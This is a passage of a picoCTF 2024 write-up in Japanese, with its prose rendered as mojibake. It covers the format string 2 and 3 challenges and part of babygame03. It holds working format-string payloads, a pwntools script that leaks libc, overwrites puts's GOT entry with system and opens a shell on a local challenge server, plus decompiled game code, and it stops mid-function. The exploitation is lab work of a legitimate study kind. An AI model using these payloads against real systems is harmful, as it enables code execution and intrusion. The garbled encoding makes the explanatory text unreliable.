å›°ã‚Šã¾ã—ãŸã€‚ã‚»ã‚ュリティコンテストãƒãƒ£ãƒ¬ãƒ³ã‚¸ãƒ–ックã«ã‚‚ã€ã‚¼ãƒãŒå…¥ã£ãŸå ´åˆã®èª¬æ˜Žã¯ã‚ã‚Šã¾ã›ã‚“。ã†ãƒ¼ã‚“ã€ã§ã¯ã€ã‚¼ãƒã‚’å«ã‚€ã‚¢ãƒ‰ãƒ¬ã‚¹ã¯ã€15番目ã«ã—ã¦ã€14番目ã¯ã€15番目を表示ã™ã‚‹å†…容ã«ã™ã‚Œã°ã„ã„ã‹ã‚‚ã§ã™ã€‚ã¤ã¾ã‚Šã€%p 㨠アドレスã®æŒ‡å®šã‚’入れ替ãˆã‚‹ã¨ã„ã†ã“ã¨ã§ã™ã€‚
期待通りã®è¡¨ç¤ºãŒå‡ºåŠ›ã•ã‚Œã¾ã—ãŸã€‚
$ echo -e '%15$pAAA\x60\x40\x40\x00\x00\x00\x00\x00' | ./vuln
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: 0x404060AAA`@@
sus = 0x21737573
You can do better!
%p ã‚’ %s ã«å¤‰æ›´ã—ã¦ã€ã‚¢ãƒ‰ãƒ¬ã‚¹ã®å…ˆã®å€¤ã‚’見ã«è¡Œãã¾ã™ã€‚
値ãªã®ã§ã€hexdumpコマンドã§è¦‹ã¾ã™ã€‚00000070 ã®è¡Œã®å¾Œã‚ã®æ–¹ã«ã€20(スペース)ã®æ¬¡ã‹ã‚‰ãŒã€%15s ã®å‡ºåŠ›ã§ã™ã€‚73 75 73 21(0x21737573)ãŒå‚ç…§ã§ãã¦ã„ã¾ã™ã€‚
$ echo -e '%15$sAAA\x60\x40\x40\x00\x00\x00\x00\x00' | ./vuln
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: sus!AAA`@@
sus = 0x21737573
You can do better!
$ echo -e '%15$sAAA\x60\x40\x40\x00\x00\x00\x00\x00' | ./vuln | hexdump -C
00000000 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 77 |You don't have w|
00000010 68 61 74 20 69 74 20 74 61 6b 65 73 2e 20 4f 6e |hat it takes. On|
00000020 6c 79 20 61 20 74 72 75 65 20 77 69 7a 61 72 64 |ly a true wizard|
00000030 20 63 6f 75 6c 64 20 63 68 61 6e 67 65 20 6d 79 | could change my|
00000040 20 73 75 73 70 69 63 69 6f 6e 73 2e 20 57 68 61 | suspicions. Wha|
00000050 74 20 64 6f 20 79 6f 75 20 68 61 76 65 20 74 6f |t do you have to|
00000060 20 73 61 79 3f 0a 48 65 72 65 27 73 20 79 6f 75 | say?.Here's you|
00000070 72 20 69 6e 70 75 74 3a 20 73 75 73 21 41 41 41 |r input: sus!AAA|
00000080 60 40 40 0a 73 75 73 20 3d 20 30 78 32 31 37 33 |`@@.sus = 0x2173|
00000090 37 35 37 33 0a 59 6f 75 20 63 61 6e 20 64 6f 20 |7573.You can do |
000000a0 62 65 74 74 65 72 21 0a |better!.|
000000a8
%s ã‚’ %n ã«å¤‰ãˆã¦ã€ã‚°ãƒãƒ¼ãƒãƒ«å¤‰æ•° sus ã®å€¤ã‚’書ãæ›ãˆã¾ã™ã€‚
期待通りã®æ›¸ãæ›ãˆãŒå‡ºæ¥ã¾ã—ãŸã€‚å…ˆé ã« %15$n ã‚’ç½®ã„ãŸã¨ãã¯ã€ãã‚Œã¾ã§ã«å‡ºåŠ›ã—ãŸæ•°ãŒã‚¼ãƒãªã®ã§ã€sus ã¯ã‚¼ãƒã«æ›¸ãæ›ã‚ã‚Šã¾ã—ãŸã€‚最åˆã« 3æ–‡å—ã® A ã‚’ç½®ãã¨ã€sus 㯠3 ã«æ›¸ãæ›ã‚ã‚Šã¾ã—ãŸã€‚
$ echo -e '%15$nAAA\x60\x40\x40\x00\x00\x00\x00\x00' | ./vuln
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: AAA`@@
sus = 0x0
You can do better!
$ echo -e 'AAA%15$n\x60\x40\x40\x00\x00\x00\x00\x00' | ./vuln
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input: AAA`@@
sus = 0x3
You can do better!
ã‚ã¨ã¯ã€ã“ã®å€¤ã‚’ 0x67616c66 ã«æ›¸ãæ›ãˆã‚Œã°ã„ã„ã€ã¨ã„ã†ã“ã¨ã«ãªã‚Šã¾ã™ã€‚値ãŒå¤§ãã„ã®ã§ã€2回ã«åˆ†ã‘ã¾ã™ã€‚値ã®å¤§ãã„æ–¹ã‹ã‚‰å…ˆã«æ›¸ãæ›ãˆã¾ã™ï¼ˆæ–‡å—æ•°ã®ã‚«ã‚¦ãƒ³ãƒˆã¯ç¶™ç¶šã™ã‚‹ãŸã‚)。最åˆã«ã€ä¸Šä½16bitã‚’ 0x6761(26,465)ã«æ›¸ãæ›ãˆã¾ã™ã€‚次ã«ã€sus ã®ä¸‹ä½16bitã‚’ 0x6c66(27,750)ã«æ›¸ãæ›ãˆã¾ã™ã€‚å·®ã¯ã€27750-26465=1285 ã§ã™ã€‚
アドレス㫠0 ã‚’å«ã‚€ãŸã‚ã€å…ˆã«æ›¸å¼ã‚’書ãå¿…è¦ãŒã‚ã‚Šã¾ã™ã€‚後ã‚ã«ã¯ 0 ã‚’å«ã¿ã¾ã™ãŒã€è¡¨ç¤ºã—ã¦ã»ã—ã„ã®ã¯å‰åŠã® AAAA ã®å‰ã¾ã§ãªã®ã§ã€å•é¡Œã‚ã‚Šã¾ã›ã‚“。
無事ã€ãƒ•ãƒ©ã‚°ãŒè¡¨ç¤ºã•ã‚Œã¾ã—ãŸã€‚
$ echo -e '%26465c%18$hn%1285c%19$hnAAAAAAA\x62\x40\x40\x00\x00\x00\x00\x00\x60\x40\x40\x00\x00\x00\x00\x00' | ./vuln
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input:
(途ä¸ã€çœç•¥ï¼‰
AAAAAAAb@@
I have NO clue how you did that, you must be a wizard. Here you go...
picoCTF{FLAGFLAGFLAG}
åŒã˜ã“ã¨ã‚’サーãƒã§å®Ÿè¡Œã™ã‚‹ã¨ã€ãƒ•ãƒ©ã‚°ãŒè¡¨ç¤ºã•ã‚Œã¾ã—ãŸã€‚
format stringシリーズã®æœ€å¾Œã®å•é¡Œã§ã™ã€‚
Medium ã®å•é¡Œã§ã™ã€‚ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆformat-string-3)㌠1ã¤ã¨ã€ã‚½ãƒ¼ã‚¹ãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆformat-string-3.c)㌠1ã¤ã¨ã€libc(libc.so.6)ã¨ã€å‹•çš„リンカ(ld-linux-x86-64.so.2)ãŒãƒ€ã‚¦ãƒ³ãƒãƒ¼ãƒ‰ã§ãã¾ã™ã€‚ã¾ãŸã€ã‚¤ãƒ³ã‚¹ã‚¿ãƒ³ã‚¹ï¼ˆã‚µãƒ¼ãƒï¼‰ã‚’èµ·å‹•ã§ãã¾ã™ã€‚
format string 3å•é¡Œ
表層解æžã‹ã‚‰è¡Œã„ã¾ã™ã€‚スタックカナリヤãŒæœ‰åŠ¹ã§ã€ãƒ¡ãƒ¢ãƒªå®Ÿè¡Œå¯èƒ½ã§ã™ã€‚è¿½åŠ ã§ lddコマンドを実行ã—ã¾ã—ãŸã€‚ダウンãƒãƒ¼ãƒ‰ã—㟠libc 㨠ld-linux ãŒä½¿ã‚れるよã†ã§ã™ï¼ˆlibc ã¯ã„ã„ã§ã™ãŒã€ld-linux ã¯è¡¨ç¤ºãŒå°‘ã—ãŠã‹ã—ã„?)。
$ file format-string-3
format-string-3: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter ./ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=54e1c4048a725df868e9a10dc975a46e8d8e5e92, not stripped
$ checksec --file=format-string-3
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO Canary found NX disabled No PIE No RPATH RW-RUNPATH 44 Symbols No 0 2 format-string-3
$ ldd format-string-3
linux-vdso.so.1 (0x00007ffea8767000)
libc.so.6 => ./libc.so.6 (0x00007fbb84dec000)
./ld-linux-x86-64.so.2 => /lib64/ld-linux-x86-64.so.2 (0x00007fbb84fd0000)
ソースコードを見ã¦ã¿ã¾ã™ã€‚フラグã®è¡¨ç¤ºãŒã‚ã‚Šã¾ã›ã‚“ã。シェルをå–å¾—ã™ã‚‹å•é¡Œã ã¨æ€ã„ã¾ã™ã€‚書å¼æ–‡å—列攻撃ã§ã€æœ€å¾Œã® puts関数を system関数ã«ç½®ãæ›ãˆã‚‹ã“ã¨ãŒå‡ºæ¥ã‚Œã°è‰¯ã•ãã†ã§ã™ãã€puts関数ã®å¼•æ•°ãŒ /bin/sh ã«ã—ã¦ãã‚Œã¦ã¾ã™ã—。
#include <stdio.h>
#define MAX_STRINGS 32
char *normal_string = "/bin/sh";
void setup() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
setvbuf(stderr, NULL, _IONBF, 0);
}
void hello() {
puts("Howdy gamers!");
printf("Okay I'll be nice. Here's the address of setvbuf in libc: %p\n", &setvbuf);
}
int main() {
char *all_strings[MAX_STRINGS] = {NULL};
char buf[1024] = {'\0'};
setup();
hello();
fgets(buf, 1024, stdin);
printf(buf);
puts(normal_string);
return 0;
}
puts関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’知る必è¦ãŒã‚ã‚Šã¾ã™ãŒã€ASLR ã®ãŸã‚ã€äº‹å‰ã«ã¯å¾—られã¾ã›ã‚“。setvbuf関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚‚毎回変化ã—ã¾ã™ãŒã€ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’表示ã—ã¦ãã‚Œã¦ã„ã‚‹ã®ã§ã€ã“れを使ã†ã¨ç›¸å¯¾çš„ã« system関数ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ãŒæ±‚ã¾ã‚Šãã†ã§ã™ã€‚
一度実行ã—ã¦ã¿ã¾ã™ã€‚
$ ./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7fbe141303f0
aa
aa
/bin/sh
ã¾ãšã€ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’調ã¹ã¾ã™ã€‚setbuf関数㮠libc内ã®ç›¸å¯¾ã‚¢ãƒ‰ãƒ¬ã‚¹ã¯ 0x7a3f0 ã§ã€system関数㮠libc内ã®ç›¸å¯¾ã‚¢ãƒ‰ãƒ¬ã‚¹ã¯ 0x4f760 ã§ã™ã€‚setbuf関数ã®çµ¶å¯¾ã‚¢ãƒ‰ãƒ¬ã‚¹ãŒè¡¨ç¤ºã•ã‚Œã‚‹ã®ã§ã€setbuf関数ã®ç›¸å¯¾ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’引ãã¨ã€libcã®ãƒ™ãƒ¼ã‚¹ã‚¢ãƒ‰ãƒ¬ã‚¹ãŒæ±‚ã¾ã‚Šã¾ã™ã€‚system関数ã®ç›¸å¯¾ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’足ã™ã¨ã€system関数ã®çµ¶å¯¾ã‚¢ãƒ‰ãƒ¬ã‚¹ãŒæ±‚ã¾ã‚Šã¾ã™ã€‚
$ nm -D libc.so.6 | grep setvbuf
000000000007a3f0 T _IO_setvbuf@@GLIBC_2.2.5
000000000007a3f0 W setvbuf@@GLIBC_2.2.5
$ nm -D libc.so.6 | grep system
000000000004f760 T __libc_system@@GLIBC_PRIVATE
000000000014e1c0 T svcerr_systemerr@GLIBC_2.2.5
000000000004f760 W system@@GLIBC_2.2.5
GDB ã§ã‚¢ã‚»ãƒ³ãƒ–ラを確èªã—ã¾ã™ã€‚
RSP + 0x100(rbp - 0x410)ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã‚’ buf ã«ä½¿ã£ã¦ã„るよã†ã§ã™ã€‚ã¤ã¾ã‚Šã€ãƒ¬ã‚¸ã‚¹ã‚¿ 5個 㨠8byte ㌠32個(0x100 / 8 = 32)ã§ã€è¨ˆ37個ãªã®ã§ã€38番目㫠buf ãŒå‡ºç¾ã™ã‚‹ã¯ãšã§ã™ã€‚
pwndbg> nearpc 20
â–º 0x40124b <main+8> sub rsp, 0x510 RSP => 0x7fffffffe120 - 0x510
0x401252 <main+15> mov rax, qword ptr fs:[0x28] RAX, [0x7ffff7ddd768]
0x40125b <main+24> mov qword ptr [rbp - 8], rax
0x40125f <main+28> xor eax, eax EAX => 0
0x401261 <main+30> lea rdx, [rbp - 0x510]
0x401268 <main+37> mov eax, 0 EAX => 0
0x40126d <main+42> mov ecx, 0x20 ECX => 0x20
0x401272 <main+47> mov rdi, rdx
0x401275 <main+50> rep stosq qword ptr [rdi], rax
0x401278 <main+53> mov qword ptr [rbp - 0x410], 0
0x401283 <main+64> mov qword ptr [rbp - 0x408], 0
0x40128e <main+75> lea rdx, [rbp - 0x400]
0x401295 <main+82> mov eax, 0 EAX => 0
0x40129a <main+87> mov ecx, 0x7e ECX => 0x7e
0x40129f <main+92> mov rdi, rdx
0x4012a2 <main+95> rep stosq qword ptr [rdi], rax
0x4012a5 <main+98> mov eax, 0 EAX => 0
0x4012aa <main+103> call setup <setup>
0x4012af <main+108> mov eax, 0 EAX => 0
0x4012b4 <main+113> call hello <hello>
0x4012b9 <main+118> mov rdx, qword ptr [rip + 0x2db0] RDX, [stdin@GLIBC_2.2.5]
0x4012c0 <main+125> lea rax, [rbp - 0x410]
0x4012c7 <main+132> mov esi, 0x400 ESI => 0x400
0x4012cc <main+137> mov rdi, rax
0x4012cf <main+140> call fgets@plt <fgets@plt>
(以é™ã€å‰²æ„›ï¼‰
ã‚„ã£ã¦ã¿ã¾ã™ã€‚åˆã£ã¦ã„るよã†ã§ã™ã€‚
$ ./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f6baf1d03f0
AAAABBBB,%38$p
AAAABBBB,0x4242424241414141
/bin/sh
ã‚ã¨ã¯ã€puts関数㮠GOT を調ã¹ã¾ã™ã€‚0x404018 ã§ã—ãŸã€‚
$ readelf -r format-string-3
Relocation section '.rela.dyn' at offset 0x15d8 contains 6 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000403fe8 000100000006 R_X86_64_GLOB_DAT 0000000000000000 __libc_start_main@GLIBC_2.34 + 0
000000403ff0 000600000006 R_X86_64_GLOB_DAT 0000000000000000 __gmon_start__ + 0
000000403ff8 000800000006 R_X86_64_GLOB_DAT 0000000000000000 setvbuf@GLIBC_2.2.5 + 0
000000404060 000700000005 R_X86_64_COPY 0000000000404060 stdout@GLIBC_2.2.5 + 0
000000404070 000900000005 R_X86_64_COPY 0000000000404070 stdin@GLIBC_2.2.5 + 0
000000404080 000a00000005 R_X86_64_COPY 0000000000404080 stderr@GLIBC_2.2.5 + 0
Relocation section '.rela.plt' at offset 0x1668 contains 4 entries:
Offset Info Type Sym. Value Sym. Name + Addend
000000404018 000200000007 R_X86_64_JUMP_SLO 0000000000000000 puts@GLIBC_2.2.5 + 0
000000404020 000300000007 R_X86_64_JUMP_SLO 0000000000000000 __stack_chk_fail@GLIBC_2.4 + 0
000000404028 000400000007 R_X86_64_JUMP_SLO 0000000000000000 printf@GLIBC_2.2.5 + 0
000000404030 000500000007 R_X86_64_JUMP_SLO 0000000000000000 fgets@GLIBC_2.2.5 + 0
pwndbg ã®å ´åˆã¯ã€gotコマンドãŒä½¿ãˆã¾ã™ã€‚楽ã¡ã‚“ã§ã™ã€‚
pwndbg> got
Filtering out read-only entries (display them with -r or --show-readonly)
State of the GOT of /home/user/svn/experiment/picoCTF/picoCTF2024_BinaryExploitation/format-string-3:
GOT protection: Partial RELRO | Found 4 GOT entries passing the filter
[0x404018] puts@GLIBC_2.2.5 -> 0x401030 ◂— endbr64
[0x404020] __stack_chk_fail@GLIBC_2.4 -> 0x401040 ◂— endbr64
[0x404028] printf@GLIBC_2.2.5 -> 0x401050 ◂— endbr64
[0x404030] fgets@GLIBC_2.2.5 -> 0x401060 ◂— endbr64
æƒ…å ±ã¯æƒã£ãŸã®ã§ã€pwntools を使ã£ã¦å®Ÿè£…ã—ã¦ã„ãã¾ã™ã€‚
pwntools ã«ã¯ã€fmtstr_payload ã¨ã„ã†æ›¸å¼æ–‡å—列攻撃を自動化ã™ã‚‹ä¾¿åˆ©ãªé–¢æ•°ãŒç”¨æ„ã•ã‚Œã¦ã„ã‚‹ãã†ã§ã™ã€‚今回ã¯ã“れを使ã£ã¦ã¿ã¾ã™ã€‚ã¡ã‚‡ã£ã¨ç·´ç¿’ã—ã¦ã¿ã¾ã™ã€‚
ã¾ãšã€ç·´ç¿’ã¨ã—ã¦ã€ã‚°ãƒãƒ¼ãƒãƒ«å¤‰æ•°ã® normal_string を書ãæ›ãˆã¦ã¿ã¾ã™ã€‚アドレスを調ã¹ã¾ã™ã€‚
$ nm format-string-3 | grep normal_st
0000000000404048 D normal_string
gdb-peda$ x/1xg 0x404048
0x404048 <normal_string>: 0x0000000000402008
gdb-peda$ x/1s 0x402008
0x402008: "/bin/sh"
- 第1引数 offset:オフセットã€ä»Šå›žã¯ 38 ã§ã™
- 第2引数 writes:書ãè¾¼ã¿å…ˆã®ã‚¢ãƒ‰ãƒ¬ã‚¹ã¨å€¤ã®è¾žæ›¸ã€ä»Šå›žã¯ã€0x402008 ã«ã€ä¾‹ãˆã°ã€0x47414c46(FLAG)を書ããŸã„ã®ã§ã€
{0x402008: 0x47414c46} ã«ã—ã¾ã™
- 第3引数 numbwritten:printf関数ãŒæ—¢ã«å‡ºåŠ›ã—ãŸãƒã‚¤ãƒˆæ•°ã€ä»Šå›žã¯ 0 ã§ã™
- 第4引数 write_size:何byteãšã¤æ›¸ã込むã‹ï¼ˆint or short or byte)ã€å¤§ãããªã‚Šãã†ãªã®ã§ short ã«ã—ã¾ã™ã€‚
ã¾ãšã€x86-64 ã‚’è¨å®šã—ã¾ã™ã€‚作られãŸãƒšã‚¤ãƒãƒ¼ãƒ‰ã‚’見るã¨ã€ä¸‹ä½16bit(0x4c46)ã®æ–¹ãŒã€ä¸Šä½16bit(0x4741)より大ãã„ã®ã§ã€å…ˆã«ã€ä¸Šä½16bitã‹ã‚‰æŒ‡å®šã—ã¦ã„ã¾ã™ã€‚
>>> context.binary = '/bin/bash'
[*] '/bin/bash'
Arch: amd64-64-little
RELRO: Full RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
FORTIFY: Enabled
>>> context.arch, context.bits
('amd64', 64)
>>> fmtstr_payload(offset=38, writes={0x402008: 0x47414c46}, numbwritten=0, write_size="short"
)
b'%19526c%42$lln%64251c%43$hnaaaab\x08 @\x00\x00\x00\x00\x00\n @\x00\x00\x00\x00\x00'
>>> fmtstr_payload(offset=38, writes={0x402008: 0x47414c46}, numbwritten=0, write_size="short").hex()
'25313935323663253432246c6c6e2536343235316325343324686e616161616208204000000000000a20400000000000'
ã§ã¯ã€è©¦ã—ã¦ã¿ã¾ã™ã€‚ã†ãƒ¼ã‚“ã€ã‚»ã‚°ãƒ¡ãƒ³ãƒ†ãƒ¼ã‚·ãƒ§ãƒ³ãƒ•ã‚©ãƒ¼ãƒ«ãƒˆãŒç™ºç”Ÿã—ã¾ã™ã€‚
$ python -c 'from pwn import *; context.bits=64; print(fmtstr_payload(offset=38, writes={0x402008: 0x47414c46}, numbwritten=0, write_size="short").decode("utf-8"))' | ./format-string-3
(途ä¸ã€çœç•¥ï¼‰
Segmentation fault
「format string 2ã€ã§è©¦ã—ã¦ã¿ã¾ã™ã€‚ã†ã¾ãã„ãã¾ã™ã。
$ python -c 'from pwn import *; context.bits=64; print(fmtstr_payload(offset=14, writes={0x404060: 0x67616c66}, numbwritten=0, write_size="short").decode("utf-8"))' | ./vuln
You don't have what it takes. Only a true wizard could change my suspicions. What do you have to say?
Here's your input:
(途ä¸ã€çœç•¥ï¼‰
I have NO clue how you did that, you must be a wizard. Here you go...
picoCTF{FLAGFLAGFLAG}
ã‚ã€åˆ†ã‹ã‚Šã¾ã—ãŸã€é–“é•ãˆã¦ã¾ã—ãŸã€‚0x402008 ã¯ã€normal_string ã«æ ¼ç´ã•ã‚Œã¦ã„るアドレスã§ã‚ã‚Šã€"/bin/sh" ãŒæ ¼ç´ã•ã‚Œã¦ã„るアドレスãªã®ã§ã€ãã“を書ãæ›ãˆã‚‹ã¨ã„ã†ã“ã¨ã¯ã€consté ˜åŸŸã‚’æ›¸ãæ›ãˆã‚‹ã“ã¨ã«ãªã‚‹ã‹ã‚‰ã§ã™ã。ãれ㯠Read Only ãªã¯ãšãªã®ã§ç„¡ç†ã§ã—ãŸã€‚ã§ã¯ã€ä»£ã‚ã‚Šã«ã€normal_string ã«æ ¼ç´ã•ã‚Œã¦ã„るアドレスを書ãæ›ãˆã‚‹ã‚ˆã†ã«ã—ã¾ã™ã€‚0x402008 ãŒæ ¼ç´ã•ã‚Œã¦ã„ã‚‹ã®ã§ã€ãれを 2byte ãšã‚‰ã—ã¦ã€0x40200a ã«æ›¸ãæ›ãˆã¾ã™ã€‚
"/b" ãŒæ¶ˆãˆã¦ã€2byte進んã ã¨ã“ã‚ã‹ã‚‰è¡¨ç¤ºã•ã‚Œã¾ã—ãŸã€æƒ³å®šé€šã‚Šã§ã™ã€‚
$ python -c 'from pwn import *; context.bits=64; print(fmtstr_payload(offset=38, writes={
0x404048: 0x40200a}, numbwritten=0, write_size="short").decode("utf-8"))' | ./format-string-3
Howdy gamers!
Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f7af9fa73f0
(途ä¸ã€çœç•¥ï¼‰
in/sh
何個ã‚ã‚‹ã‹ã¨ã‹æ•°ãˆãªãã¦ã„ã„ã®ã§ä¾¿åˆ©ã§ã™ã。実装ã—㟠Pythonスクリプトã¯ä»¥ä¸‹ã§ã™ã€‚
import os, sys
from pwn import *
context.bits = 64
adrs = '127.0.0.1'
port = 4000
setbuf_raddr = 0x7a3f0
system_raddr = 0x4f760
puts_got = 0x404018
proc = remote( adrs, port )
print( proc.recvline() )
ret = proc.recvline()
print( ret )
ret = ret.decode( 'utf-8' )
assert "setvbuf" in ret, f"ret={ret}"
idx = ret.index("libc")
setbuf_aaddr = int( ret[idx + 6:], base=16 )
print( f"setbuf_aaddr={setbuf_aaddr}" )
libc_base = setbuf_aaddr - setbuf_raddr
system_aaddr = libc_base + system_raddr
payload = fmtstr_payload( offset=38, writes={puts_got: system_aaddr}, numbwritten=0, write_size="short" )
proc.send( payload )
proc.interactive()
実行ã—ã¾ã™ã€‚
$ python tmp.py
[+] Opening connection to 127.0.0.1 on port 4000: Done
b'Howdy gamers!\n'
b"Okay I'll be nice. Here's the address of setvbuf in libc: 0x7f504fe933f0\n"
setbuf_aaddr=139982914794480
[*] Switching to interactive mode
$ ls
(途ä¸ã€çœç•¥ï¼‰
atk.bin
flag.txt
format-string-0
format-string-0.c
format-string-1
format-string-1.c
format-string-3
format-string-3.c
heap0
heap1
heap2
heap3
ld-linux-x86-64.so.2
libc.so.6
peda-session-chall.txt
peda-session-format-string-1.txt
peda-session-format-string-3.txt
peda-session-vuln.txt
pwnable.log
pwnable.py
secret-menu-item-1.txt
secret-menu-item-2.txt
tmp.py
vuln
vuln.c
シェルãŒå–ã‚Œã¾ã—ãŸã€‚サーãƒã§ã‚‚åŒã˜ã‚ˆã†ã«ã™ã‚‹ã¨ã€ã‚«ãƒ¬ãƒ³ãƒˆãƒ‡ã‚£ãƒ¬ã‚¯ãƒˆãƒªã« flag.txt ãŒã‚ã‚Šã€cat ã™ã‚‹ã¨ã€ãƒ•ãƒ©ã‚°ãŒè¡¨ç¤ºã•ã‚Œã¾ã—ãŸã€‚
format stringシリーズを完了ã—ã¾ã—ãŸã€‚
babygame03(400ãƒã‚¤ãƒ³ãƒˆï¼‰
ã¤ã„ã«ã€Hard ã®å•é¡Œã§ã™ã€‚ãƒã‚¤ãƒŠãƒªãƒ•ã‚¡ã‚¤ãƒ«ï¼ˆgame)㌠1ã¤ã ã‘ダウンãƒãƒ¼ãƒ‰ã§ãã¾ã™ã€‚ã¾ãŸã€ã‚¤ãƒ³ã‚¹ã‚¿ãƒ³ã‚¹ï¼ˆã‚µãƒ¼ãƒï¼‰ã‚’èµ·å‹•ã§ãã¾ã™ã€‚今回ã¯ã‚½ãƒ¼ã‚¹ã‚³ãƒ¼ãƒ‰ã‚’æä¾›ã—ã¦ãã‚Œãªã„よã†ã§ã™ã€‚
babygame03å•é¡Œ
表層解æžã§ã™ã€‚シンボルã¯æ®‹ã£ã¦ã„ã¾ã™ã€‚32bitプãƒã‚°ãƒ©ãƒ ã§ã€ãƒ¡ãƒ¢ãƒªå®Ÿè¡Œä¸å¯ã§ã€ãƒ—ãƒã‚°ãƒ©ãƒ ã®ã‚¢ãƒ‰ãƒ¬ã‚¹ãƒ©ãƒ³ãƒ€ãƒ 化ã¯ç„¡åŠ¹ã§ã™ã€‚
$ file game
game: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, BuildID[sha1]=a029dc18edaa968bc97e9c92c73151ae8155edaf, for GNU/Linux 3.2.0, not stripped
$ checksec --file=game
RELRO STACK CANARY NX PIE RPATH RUNPATH Symbols FORTIFY Fortified Fortifiable FILE
Partial RELRO No canary found NX enabled No PIE No RPATH No RUNPATH 60 Symbols No 0 2 game
Ghidra ã§é€†ã‚³ãƒ³ãƒ‘イルã—ã¾ã™ã€‚main関数㨠win関数ã¯ä»¥ä¸‹ã§ã™ã€‚変数åã¯åˆ†ã‹ã‚Šã‚„ã™ã„åå‰ã«å¤‰ãˆã¦ã„ã¾ã™ã€‚
win関数ã«è¡Œãã«ã¯ã€do while を抜ã‘ã‚‹å¿…è¦ãŒã‚ã‚Šã¾ã™ã€‚ãã®æ¡ä»¶ã¯ã€tate ㌠0x1dã€ã‹ã¤ã€yoko ㌠0x59ã€ã‹ã¤ã€level ㌠5ã€ã‹ã¤ã€local_14 ㌠4 ã¨ãªã‚‹ã“ã¨ã®ã‚ˆã†ã§ã™ã€‚
2段階ã‚るよã†ã§ã€1段階目をçªç ´ã™ã‚‹ã«ã¯ã€tate ㌠0x1dã€ã‹ã¤ã€yoko ㌠0x59ã€ã‹ã¤ã€level ㌠4 ã§ã¯ãªã„ã€ã¨ãªã‚‹ã“ã¨ãŒå¿…è¦ã®ã‚ˆã†ã§ã™ã€‚
undefined4 main(void)
{
int iVar1;
int level;
int tate;
int yoko;
undefined map [2700];
char input;
int local_14;
undefined *local_10;
local_10 = &stack0x00000004;
init_player(&tate);
level = 1;
local_14 = 0;
init_map(map,&tate,&level);
print_map(map,&tate,&level);
signal(2,sigint_handler);
do {
iVar1 = getchar();
input = (char)iVar1;
move_player(&tate,(int)input,map,&level);
print_map(map,&tate,&level);
if (((tate == 0x1d) && (yoko == 0x59)) && (level != 4)) {
puts("You win!\n Next level starting ");
local_14 = local_14 + 1;
level = level + 1;
init_player(&tate);
init_map(map,&tate,&level);
}
} while (((tate != 0x1d) || (yoko != 0x59)) || ((level != 5 || (local_14 != 4))));
win(&level);
return 0;
}
void win(int *level)
{
char local_4c [60];
FILE *local_10;
local_10 = fopen("flag.txt","r");
if (local_10 == (FILE *)0x0) {
puts("Please create \'flag.txt\' in this directory with your own debugging flag.");
fflush(_stdout);
exit(0);
}
fgets(local_4c,0x3c,local_10);
if (*level == 5) {
printf(local_4c);
fflush(_stdout);
}
return;
}
続ã„ã¦ã€init_player関数ã€init_map関数ã€print_map関数ã€move_player関数ã§ã™ã€‚
void init_player(undefined4 *player)
{
*player = 4;
player[1] = 4;
player[2] = 0x32;
return;
}
void init_map(int map,int *player,int *level)
{
int iVar1;
int local_14;
int local_10;
local_10 = 0;
do {
if (0x1d < local_10) {
return;
}
for (local_14 = 0; local_14 < 0x5a; local_14 = local_14 + 1) {
if ((local_10 == 0x1d) && (local_14 == 0x59)) {
*(undefined *)(map + 0xa8b) = 0x58;
}
else if ((local_10 == *player) && (local_14 == player[1])) {
*(undefined *)(local_14 + map + local_10 * 0x5a) = player_tile;
}
else {
iVar1 = rand();
if (local_10 == iVar1 % *level) {
iVar1 = rand();
if (local_14 == iVar1 % *level) {
*(undefined *)(local_14 + map + local_10 * 0x5a) = 0x23;
goto LAB_08049301;
}
}
*(undefined *)(local_14 + map + local_10 * 0x5a) = 0x2e;
}
LAB_08049301:
}
local_10 = local_10 + 1;
} while( true );
}
void print_map(int map,undefined4 player,undefined4 level)
{
int local_14;
int local_10;
clear_screen();
find_player_pos(map,level);
find_end_tile_pos(map);
print_lives_left(player);
for (local_10 = 0; local_10 < 0x1e; local_10 = local_10 + 1) {
for (local_14 = 0; local_14 < 0x5a; local_14 = local_14 + 1) {
putchar((int)*(char *)(local_14 + map + local_10 * 0x5a));
}
putchar(10);
}
fflush(_stdout);
return;
}
void move_player(int *player,char input,int map,undefined4 level)
{
int iVar1;
if (player[2] < 1) {
puts("No more lives left. Game over!");
fflush(_stdout);
exit(0);
}
if (input == 'l') {
iVar1 = getchar();
player_tile = (undefined)iVar1;
}
if (input == 'p') {
solve_round(map,player,level);
}
*(undefined *)(*player * 0x5a + map + player[1]) = 0x2e;
if (input == 'w') {
*player = *player + -1;
}
else if (input == 's') {
*player = *player + 1;
}
else if (input == 'a') {
player[1] = player[1] + -1;
}
else if (input == 'd') {
player[1] = player[1] + 1;
}
if (*(char *)(*player * 0x5a + map + player[1]) == '#') {
puts("You hit an obstacle!");
fflush(_stdout);
exit(0);
}
